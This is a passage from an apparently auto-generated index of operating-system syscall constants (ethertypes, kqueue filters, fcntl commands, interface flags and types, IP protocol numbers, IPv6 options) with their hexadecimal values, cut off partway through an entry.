ETHERTYPE_VARIAN (line 500) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 501) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 502) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 503) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 504) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 505) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 506) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 507) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 508) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 509) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 510) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 511) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 512) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 513) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 514) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 515) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 516) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 517) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 518) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 519) | ETHER_ADDR_LEN = 0x6 constant ETHER_CRC_LEN (line 520) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 521) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 522) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 523) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_LEN (line 524) | ETHER_MAX_LEN = 0x5ee constant ETHER_MAX_LEN_JUMBO (line 525) | ETHER_MAX_LEN_JUMBO = 0x233a constant ETHER_MIN_LEN (line 526) | ETHER_MIN_LEN = 0x40 constant ETHER_PPPOE_ENCAP_LEN (line 527) | ETHER_PPPOE_ENCAP_LEN = 0x8 constant ETHER_TYPE_LEN (line 528) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 529) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 530) | EVFILT_AIO = 0x2 constant EVFILT_PROC (line 531) | EVFILT_PROC = 0x4 constant EVFILT_READ (line 532) | EVFILT_READ = 0x0 constant EVFILT_SIGNAL (line 533) | EVFILT_SIGNAL = 0x5 constant EVFILT_SYSCOUNT (line 534) | EVFILT_SYSCOUNT = 0x7 constant EVFILT_TIMER (line 535) | EVFILT_TIMER = 0x6 constant EVFILT_VNODE (line 536) | EVFILT_VNODE = 0x3 constant EVFILT_WRITE (line 537) | EVFILT_WRITE = 0x1 constant EV_ADD (line 538) | EV_ADD = 0x1 constant EV_CLEAR (line 539) | EV_CLEAR = 0x20 constant EV_DELETE (line 540) | EV_DELETE = 0x2 constant EV_DISABLE (line 541) | EV_DISABLE = 0x8 constant EV_ENABLE (line 542) | EV_ENABLE = 0x4 constant EV_EOF (line 543) | EV_EOF = 0x8000 constant EV_ERROR (line 544) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 545) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 546) | EV_ONESHOT = 0x10 constant EV_SYSFLAGS (line 547) | EV_SYSFLAGS = 0xf000 constant EXTA (line 548) | EXTA = 0x4b00 constant EXTATTR_CMD_START (line 549) | EXTATTR_CMD_START = 0x1 constant EXTATTR_CMD_STOP (line 550) | EXTATTR_CMD_STOP = 0x2 constant EXTATTR_NAMESPACE_SYSTEM (line 551) | EXTATTR_NAMESPACE_SYSTEM = 0x2 constant EXTATTR_NAMESPACE_USER (line 552) | EXTATTR_NAMESPACE_USER = 0x1 constant EXTB (line 553) | EXTB = 0x9600 constant EXTPROC (line 554) | EXTPROC = 0x800 constant FD_CLOEXEC (line 555) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 556) | FD_SETSIZE = 0x100 constant FLUSHO (line 557) | FLUSHO = 0x800000 constant F_CLOSEM (line 558) | F_CLOSEM = 0xa constant F_DUPFD (line 559) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 560) | F_DUPFD_CLOEXEC = 0xc constant F_FSCTL (line 561) | F_FSCTL = -0x80000000 constant F_FSDIRMASK (line 562) | F_FSDIRMASK = 0x70000000 constant F_FSIN (line 563) | F_FSIN = 0x10000000 constant F_FSINOUT (line 564) | F_FSINOUT = 0x30000000 constant F_FSOUT (line 565) | F_FSOUT = 0x20000000 constant F_FSPRIV (line 566) | F_FSPRIV = 0x8000 constant F_FSVOID (line 567) | F_FSVOID = 0x40000000 constant F_GETFD (line 568) | F_GETFD = 0x1 constant F_GETFL (line 569) | F_GETFL = 0x3 constant F_GETLK (line 570) | F_GETLK = 0x7 constant F_GETNOSIGPIPE (line 571) | F_GETNOSIGPIPE = 0xd constant F_GETOWN (line 572) | F_GETOWN = 0x5 constant F_MAXFD (line 573) | F_MAXFD = 0xb constant F_OK (line 574) | F_OK = 0x0 constant F_PARAM_MASK (line 575) | F_PARAM_MASK = 0xfff constant F_PARAM_MAX (line 576) | F_PARAM_MAX = 0xfff constant F_RDLCK (line 577) | F_RDLCK = 0x1 constant F_SETFD (line 578) | F_SETFD = 0x2 constant F_SETFL (line 579) | F_SETFL = 0x4 constant F_SETLK (line 580) | F_SETLK = 0x8 constant F_SETLKW (line 581) | F_SETLKW = 0x9 constant F_SETNOSIGPIPE (line 582) | F_SETNOSIGPIPE = 0xe constant F_SETOWN (line 583) | F_SETOWN = 0x6 constant F_UNLCK (line 584) | F_UNLCK = 0x2 constant F_WRLCK (line 585) | F_WRLCK = 0x3 constant HUPCL (line 586) | HUPCL = 0x4000 constant HW_MACHINE (line 587) | HW_MACHINE = 0x1 constant ICANON (line 588) | ICANON = 0x100 constant ICMP6_FILTER (line 589) | ICMP6_FILTER = 0x12 constant ICRNL (line 590) | ICRNL = 0x100 constant IEXTEN (line 591) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 592) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 593) | IFAN_DEPARTURE = 0x1 constant IFA_ROUTE (line 594) | IFA_ROUTE = 0x1 constant IFF_ALLMULTI (line 595) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 596) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 597) | IFF_CANTCHANGE = 0x8f52 constant IFF_DEBUG (line 598) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 599) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 600) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 601) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 602) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 603) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 604) | IFF_NOARP = 0x80 constant IFF_NOTRAILERS (line 605) | IFF_NOTRAILERS = 0x20 constant IFF_OACTIVE (line 606) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 607) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 608) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 609) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 610) | IFF_SIMPLEX = 0x800 constant IFF_UP (line 611) | IFF_UP = 0x1 constant IFNAMSIZ (line 612) | IFNAMSIZ = 0x10 constant IFT_1822 (line 613) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 614) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 615) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 616) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 617) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 618) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 619) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 620) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 621) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 622) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 623) | IFT_ASYNC = 0x54 constant IFT_ATM (line 624) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 625) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 626) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 627) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 628) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 629) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 630) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 631) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 632) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 633) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BRIDGE (line 634) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 635) | IFT_BSC = 0x53 constant IFT_CARP (line 636) | IFT_CARP = 0xf8 constant IFT_CCTEMUL (line 637) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 638) | IFT_CEPT = 0x13 constant IFT_CES (line 639) | IFT_CES = 0x85 constant IFT_CHANNEL (line 640) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 641) | IFT_CNR = 0x55 constant IFT_COFFEE (line 642) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 643) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 644) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 645) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 646) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 647) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 648) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 649) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 650) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 651) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 652) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 653) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 654) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 655) | IFT_DS3 = 0x1e constant IFT_DTM (line 656) | IFT_DTM = 0x8c constant IFT_DVBASILN (line 657) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 658) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 659) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 660) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 661) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 662) | IFT_ECONET = 0xce constant IFT_EON (line 663) | IFT_EON = 0x19 constant IFT_EPLRS (line 664) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 665) | IFT_ESCON = 0x49 constant IFT_ETHER (line 666) | IFT_ETHER = 0x6 constant IFT_FAITH (line 667) | IFT_FAITH = 0xf2 constant IFT_FAST (line 668) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 669) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 670) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 671) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 672) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 673) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 674) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 675) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 676) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 677) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 678) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 679) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 680) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 681) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 682) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 683) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 684) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 685) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 686) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 687) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 688) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 689) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 690) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 691) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 692) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 693) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 694) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 695) | IFT_HSSI = 0x2e constant IFT_HY (line 696) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 697) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 698) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 699) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 700) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 701) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 702) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 703) | IFT_IFGSN = 0x91 constant IFT_IMT (line 704) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 705) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 706) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 707) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 708) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 709) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 710) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 711) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 712) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 713) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 714) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 715) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 716) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 717) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 718) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 719) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 720) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 721) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 722) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 723) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 724) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 725) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 726) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 727) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 728) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 729) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 730) | IFT_LAPB = 0x10 constant IFT_LAPD (line 731) | IFT_LAPD = 0x4d constant IFT_LAPF (line 732) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 733) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 734) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 735) | IFT_LOOP = 0x18 constant IFT_MEDIAMAILOVERIP (line 736) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 737) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 738) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 739) | IFT_MODEM = 0x30 constant IFT_MPC (line 740) | IFT_MPC = 0x71 constant IFT_MPLS (line 741) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 742) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 743) | IFT_MSDSL = 0x8f constant IFT_MVL (line 744) | IFT_MVL = 0xbf constant IFT_MYRINET (line 745) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 746) | IFT_NFAS = 0xaf constant IFT_NSIP (line 747) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 748) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 749) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 750) | IFT_OTHER = 0x1 constant IFT_P10 (line 751) | IFT_P10 = 0xc constant IFT_P80 (line 752) | IFT_P80 = 0xd constant IFT_PARA (line 753) | IFT_PARA = 0x22 constant IFT_PFLOG (line 754) | IFT_PFLOG = 0xf5 constant IFT_PFSYNC (line 755) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 756) | IFT_PLC = 0xae constant IFT_PON155 (line 757) | IFT_PON155 = 0xcf constant IFT_PON622 (line 758) | IFT_PON622 = 0xd0 constant IFT_POS (line 759) | IFT_POS = 0xab constant IFT_PPP (line 760) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 761) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 762) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 763) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 764) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 765) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 766) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 767) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 768) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 769) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 770) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 771) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 772) | IFT_PVC = 0xf1 constant IFT_Q2931 (line 773) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 774) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 775) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 776) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 777) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 778) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 779) | IFT_RS232 = 0x21 constant IFT_RSRB (line 780) | IFT_RSRB = 0x4f constant IFT_SDLC (line 781) | IFT_SDLC = 0x11 constant IFT_SDSL (line 782) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 783) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 784) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 785) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 786) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 787) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 788) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 789) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 790) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 791) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 792) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 793) | IFT_SONETVT = 0x33 constant IFT_SRP (line 794) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 795) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 796) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 797) | IFT_STARLAN = 0xb constant IFT_STF (line 798) | IFT_STF = 0xd7 constant IFT_T1 (line 799) | IFT_T1 = 0x12 constant IFT_TDLC (line 800) | IFT_TDLC = 0x74 constant IFT_TELINK (line 801) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 802) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 803) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 804) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 805) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 806) | IFT_ULTRA = 0x1d constant IFT_USB (line 807) | IFT_USB = 0xa0 constant IFT_V11 (line 808) | IFT_V11 = 0x40 constant IFT_V35 (line 809) | IFT_V35 = 0x2d constant IFT_V36 (line 810) | IFT_V36 = 0x41 constant IFT_V37 (line 811) | IFT_V37 = 0x78 constant IFT_VDSL (line 812) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 813) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 814) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 815) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 816) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 817) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 818) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 819) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 820) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 821) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 822) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 823) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 824) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 825) | IFT_VOICEOVERIP = 0x68 constant IFT_X213 (line 826) | IFT_X213 = 0x5d constant IFT_X25 (line 827) | IFT_X25 = 0x5 constant IFT_X25DDN (line 828) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 829) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 830) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 831) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 832) | IFT_XETHER = 0x1a constant IGNBRK (line 833) | IGNBRK = 0x1 constant IGNCR (line 834) | IGNCR = 0x80 constant IGNPAR (line 835) | IGNPAR = 0x4 constant IMAXBEL (line 836) | IMAXBEL = 0x2000 constant INLCR (line 837) | INLCR = 0x40 constant INPCK (line 838) | INPCK = 0x10 constant IN_CLASSA_HOST (line 839) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 840) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 841) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 842) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 843) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 844) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 845) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 846) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 847) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 848) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 849) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 850) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 851) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 852) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 853) | IN_LOOPBACKNET = 0x7f constant IPPROTO_AH (line 854) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 855) | IPPROTO_CARP = 0x70 constant IPPROTO_DONE (line 856) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 857) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 858) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 859) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 860) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 861) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 862) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 863) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 864) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 865) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 866) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 867) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 868) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 869) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 870) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 871) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 872) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 873) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 874) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 875) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IPV6_ICMP (line 876) | IPPROTO_IPV6_ICMP = 0x3a constant IPPROTO_MAX (line 877) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 878) | IPPROTO_MAXID = 0x34 constant IPPROTO_MOBILE (line 879) | IPPROTO_MOBILE = 0x37 constant IPPROTO_NONE (line 880) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 881) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 882) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 883) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 884) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 885) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 886) | IPPROTO_RSVP = 0x2e constant IPPROTO_TCP (line 887) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 888) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 889) | IPPROTO_UDP = 0x11 constant IPPROTO_VRRP (line 890) | IPPROTO_VRRP = 0x70 constant IPV6_CHECKSUM (line 891) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 892) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 893) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 894) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 895) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 896) | IPV6_DSTOPTS = 0x32 constant IPV6_FAITH (line 897) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 898) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 899) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 900) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 901) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 902) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 903) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 904) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 905) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 906) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 907) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 908) | IPV6_MAXPACKET = 0xffff constant IPV6_MMTU (line 909) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 910) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 911) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 912) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 913) | IPV6_NEXTHOP = 0x30 constant IPV6_PATHMTU (line 914) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 915) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 916) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 917) | 